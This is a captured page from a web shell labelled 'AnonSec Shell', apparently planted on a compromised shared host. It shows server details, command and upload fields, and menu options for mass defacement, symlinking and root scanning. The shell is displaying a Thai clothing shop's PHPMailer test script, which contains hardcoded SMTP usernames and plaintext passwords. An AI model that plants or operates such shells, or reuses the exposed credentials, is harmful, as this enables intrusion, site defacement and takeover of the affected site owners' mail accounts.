AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 172.71.28.146   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/homhuan.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/homhuan.com/index_mailh.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Homhuan ชุดปฏิบัติธรรม ชุดขาว สินค้าคุณภาพ</title>
</head>

<body>


<?php
include("include/PHPMailer_v5.0.2/class.phpmailer.php");
$mail = new PHPMailer();

$body = "test UTF-8  SMTP Server  PHPMailer.";

//$mail->CharSet = 'UTF-8';
$mail->CharSet ="ISO-8859-1";
$mail->IsSMTP();
$mail->SMTPDebug = 2;
$mail->SMTPAuth = true;
$mail->SMTPSecure = "ssl"; //ssl / tls
/*$mail->Host = 'smtp.gmail.com';//"smtp.yourdomain.com"; // SMTP server
$mail->Port = 465; // พอร์ท
$mail->Username = "[email protected]"; // account SMTP
$mail->Password = "bull4105773"; // รหัสผ่าน SMTP*/

$mail->Host = 'mail.onnud20.com';//"smtp.yourdomain.com"; // SMTP server
$mail->Port = 25; // พอร์ท
$mail->Username = "[email protected]"; // account SMTP
$mail->Password = "NoNore23"; // รหัสผ่าน SMTP



$mail->SetFrom("[email protected]", "yourname");
$mail->AddReplyTo("[email protected]", "yourname");
$mail->Subject = "test PHPMailer.";

$mail->MsgHTML($body);

$mail->AddAddress("[email protected]"); // ผู้รับคนที่หนึ่ง
$mail->AddAddress("[email protected]"); // ผู้รับคนที่สอง
//$mail->AddAddress("[email protected]", "v_chai"); // ผู้รับคนที่สอง<br />
//$mail->AddAddress("[email protected]", "v_chai"); // ผู้รับคนที่สอง

if(!$mail->Send()) {
    echo "Mailer Error: " . $mail->ErrorInfo;
} else {
    echo "Message sent!";
}
?>



</body>
</html>

Anon7 - 2022
AnonSec Team